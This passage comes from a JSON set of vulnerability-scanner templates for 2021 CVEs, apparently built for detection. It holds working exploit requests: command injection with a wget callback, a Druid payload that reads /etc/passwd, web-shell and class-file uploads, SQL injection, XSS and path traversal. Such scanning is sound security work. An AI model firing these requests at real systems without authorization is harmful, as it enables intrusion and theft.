//interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]},{"type":"status","status":[301,302,307,308]}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-40859","info":{"name":"Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/about_state"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"pbx\"","\"dongleStatus\":0","\"macaddr\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-45232","info":{"name":"Apache APISIX Dashboard <2.10.1 - API Unauthorized Access","severity":"critical"},"requests":[{"method":"GET","path":["{{RootURL}}/apisix/admin/migrate/export"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"Consumers\":"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38702","info":{"name":"Cyberoam NetGenie Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tweb/ft.php?u=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41266","info":{"name":"MinIO Operator Console Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /api/v1/login/oauth2/auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"code\":\"test\",\"state\":\"test\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sessionId"]},{"type":"word","part":"header","words":["token"]},{"type":"status","status":[201,200],"condition":"or"}]}]},{"id":"CVE-2021-30461","info":{"name":"VoipMonitor <24.61 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /index.php HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nContent-Type: application/x-www-form-urlencoded\n\nSPOOLDIR=test\".system(id).\"&recheck=Recheck\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups=","VoIPmonitor installation"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40971","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword1]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21801","info":{"name":"Advantech R-SeeNet - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/php/device_graph_page.php?graph=%22zlo%20onerror=alert(1)%20%22"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"zlo onerror=alert(1) \"","Device Status Graph"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40150","info":{"name":"Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/conf/nginx.conf"],"matchers-condition":"and","matchers":[{"type":"word","words":["server","listen","fastcgi"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-36450","info":{"name":"Verint Workforce Optimization 15.2.8.10048 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3C%2Fh1%3E26 HTTP/1.1\nHost: {{Hostname}}\n","POST /wfo/control/signin?rd=%2Fwfo%2Fcontrol%2Fmy_notifications%3FNEWUINAV%3D%22%3E%3Ch1%3ETest%3Ch1%3E%26 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nbrowserCheckEnabled=true&username=admin&language=en_US&defaultHttpPort=80&screenHeight=1080&screenWidth=1920&pageModelType=0&pageDirty=false&pageAction=Login&csrfp_login={{csrfp_login}}\n"],"cookie-reuse":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><h1>Test</h1>26\" class=\"loginUserNameText"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrfp_login","group":1,"regex":["csrfp_login=([a-zA-Z0-9]+);"],"internal":true,"part":"header"}]}]},{"id":"CVE-2021-25298","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=4&wizard=digitalocean&no_ssl_verify=1&ip_address=127.0.0.1%3b%20wget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Connection Information","Host Check"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25085","info":{"name":"WOOF WordPress plugin - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=woof_draw_products&woof_redraw_elements[]=<img%20src=x%20onerror=alert(document.domain)>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"additional_fields\":[\"<img src=x onerror=alert(document.domain)>\"]}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-37416","info":{"name":"Zoho ManageEngine ADSelfService Plus <=6103 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/LoadFrame?frame_name=x&src=x&single_signout=x%27%3E%3C/iframe%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["></iframe><script>alert(1)</script>","adsf/js/"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24931","info":{"name":"WordPress Secure Copy Content Protection and Content Locking <2.8.2 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)%20AND%20(SELECT%205921%20FROM%20(SELECT(SLEEP(6)))LxjM)%20AND%20(7754=775&type=json HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"{\\\"status\\\":true\")"],"condition":"and"}]}]},{"id":"CVE-2021-40968","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /install.php?page=4 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsettingsform[newpassword2]=pdteam'+onclick='alert(document.domain)\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onclick='alert(document.domain)","Spotweb"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40539","info":{"name":"Zoho ManageEngine ADSelfService Plus v6113 - Unauthenticated Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=8b1ab266c41afb773af2e064bc526458\n\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--8b1ab266c41afb773af2e064bc526458\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"ws.jsp\"\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2021-40539\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n--8b1ab266c41afb773af2e064bc526458--\n","POST /./RestAPI/LogonCustomization HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=43992a07d9a30213782780204a9f032b\n\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"methodToCall\"\n\nunspecified\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"Save\"\n\nyes\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"form\"\n\nsmartcard\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"operation\"\n\nAdd\n--43992a07d9a30213782780204a9f032b\nContent-Disposition: form-data; name=\"CERTIFICATE_PATH\"; filename=\"Si.class\"\n\n{{hex_decode('CAFEBABE0000003400280D0A000C00160D0A0017001807001908001A08001B08001C08001D08001E0D0A0017001F0700200700210700220100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100083C636C696E69743E01000D0A537461636B4D61705461626C6507002001000D0A536F7572636546696C6501000753692E6A6176610C000D0A000E0700230C002400250100106A6176612F6C616E672F537472696E67010003636D640100022F63010004636F707901000677732E6A737001002A2E2E5C776562617070735C61647373705C68656C705C61646D696E2D67756964655C746573742E6A73700C002600270100136A6176612F696F2F494F457863657074696F6E01000253690100106A6176612F6C616E672F4F626A6563740100116A6176612F6C616E672F52756E74696D6501000D0A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B01000465786563010028285B4C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0021000B000C0000000000020001000D0A000E0001000F0000001D00010001000000052AB70001B10000000100100000000600010000000200080011000E0001000F00000064000500020000002BB800024B2A08BD000359031204535904120553590512065359061207535907120853B600094CA700044BB10001000000260029000D0A00020010000000120004000000050004000600260007002A00080012000000070002690700130000010014000000020015')}}\n--43992a07d9a30213782780204a9f032b--\n","POST /./RestAPI/Connection HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nmethodToCall=openSSLTool&action=generateCSR&KEY_LENGTH=1024+-providerclass+Si+-providerpath+%22..%5Cbin%22\n","GET /help/admin-guide/test.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["114f7ce498a54a1be1de1f1e5731d0ea"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41277","info":{"name":"Metabase Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/geojson?url=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-42565","info":{"name":"myfactory FMS  -  Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E","{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-43810","info":{"name":"Admidio - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/adm_program/system/redirect.php?url=javascript://%250aalert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please click <a href=\"javascript://%0aalert(document.domain)\" target=\"_self\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33851","info":{"name":"WordPress Customize Login Image <3.5.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=customize-login-image/customize-login-image-options.php HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\noption_page=customize-login-image-settings-group&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Foptions-general.php%3Fpage%3Dcustomize-login-image%252Fcustomize-login-image-options.php%26settings-updated%3Dtrue&cli_logo_url=<script>alert(document.domain)</script>&cli_logo_file=&cli_login_background_color=&cli_custom_css=\n","GET /wp-login.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["status_code_4 == 200","contains(header_4, \"text/html\")","contains(body_4, \"Go to <script>alert(document.domain)</script>\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["name=\"_wpnonce\" value=\"([0-9a-zA-Z]+)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-1497","info":{"name":"Cisco HyperFlex HX Data Platform - Remote Command Execution","severity":"critical"},"requests":[{"raw":["POST /auth/change HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n","POST /auth HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&password={{url_encode(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2021-46072","info":{"name":"Vehicle Service Management System 1.0 - Stored Cross Site Scripting","severity":"medium"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername={{username}}&password={{password}}\n","POST /classes/Master.php?f=save_service HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid=&service=%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e&description=%3cp%3e%22%3e%3cscript%3ealert%28document.domain%29%3c%2fscript%3e%3cbr%3e%3c%2fp%3e&status=1\n","GET /admin/?page=maintenance/services HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header_3, 'text/html')","status_code_3 == 200","contains(body_3, \"<td>\\\"><script>alert(document.domain)</script></td>\")"],"condition":"and"}]}]},{"id":"CVE-2021-42567","info":{"name":"Apereo CAS Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /cas/v1/tickets/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername=%3Cimg%2Fsrc%2Fonerror%3Dalert%28document.domain%29%3E&password=test\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["<img/src/onerror=alert(document.domain)>","java.util.HashMap"],"condition":"and"},{"type":"status","status":[401]}]}]},{"id":"CVE-2021-40661","info":{"name":"IND780 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/IND780/excalweb.dll?webpage=../../AutoCE.ini"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["ExePath=\\Windows","WorkDir=\\Windows"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-25864","info":{"name":"Hue Magic 3.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/hue/assets/..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-29484","info":{"name":"Ghost CMS <=4.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ghost/preview"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["XMLHttpRequest.prototype.open"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-21973","info":{"name":"VMware vSphere - Server-Side Request Forgery","severity":"medium"},"requests":[{"raw":["GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHost: {{Hostname}}\nVcip: {{interactsh-url}}\nVcpassword: {{rand_base(6)}}\nVcusername: {{rand_base(6)}}\nReqresource: {{rand_base(6)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["The server sent HTTP status code 200"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2021-24237","info":{"name":"WordPress Realteo <=1.2.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus%3Dalert(/{{randstr}}/)%3B%2F%2F"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["autofocus onfocus=alert(/{{randstr}}/);//","Nothing found"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35380","info":{"name":"TermTalk Server 3.24.0.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/file?valore=../../../../../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2021-27320","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&lastname={{randstr}}&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38704","info":{"name":"ClinicCases 7.3.3 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22873","info":{"name":"Revive Adserver <5.1.0 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/ads/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserve/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/adserver/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/openx/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/revive/www/delivery/lg.php?dest=http://interact.sh","{{BaseURL}}/www/delivery/lg.php?dest=http://interact.sh"],"stop-at-first-match":true,"host-redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2021-24891","info":{"name":"WordPress Elementor Website Builder <3.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/elementor/assets/js/frontend.min.js","{{BaseURL}}/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoibnVsbCIsImh0bWwiOiI8c2NyaXB0PmFsZXJ0KCd4c3MnKTwvc2NyaXB0PiJ9"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["compare_versions(version, '> 1.5.0', '< 3.1.4') && status_code_1 == 200 && status_code_2 == 200"]},{"type":"regex","part":"body_1","regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"]}],"extractors":[{"type":"regex","name":"version","group":1,"regex":["elementor[\\s-]*v(([0-3]+\\.(([0-5]+\\.[0-5]+)|[0-4]+\\.[0-9]+))|[0-2]+[0-9.]+)"],"internal":true},{"type":"kval","kval":["version"]}]}]},{"id":"CVE-2021-37580","info":{"name":"Apache ShenYu Admin JWT - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /dashboardUser HTTP/1.1\nHost: {{Hostname}}\nX-Access-Token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyTmFtZSI6ImFkbWluIiwiZXhwIjoxNjM3MjY1MTIxfQ.-jjw2bGyQxna5Soe4fLVLaD3gUT5ALTcsvutPQoE2qk\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["query success","\"userName\":\"admin\"","\"code\":200"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24406","info":{"name":"WordPress wpForo Forum < 1.9.7 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/community/?foro=signin&redirect_to=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2021-42887","info":{"name":"TOTOLINK EX1200T 4.1.2cu.5215 - Authentication Bypass","severity":"critical"},"requests":[{"raw":["GET /login.htm HTTP/1.1\nHost: {{Hostname}}\n","GET /formLoginAuth.htm?authCode=1&userName=admin&goURL=&action=login HTTP/1.1\nHost: 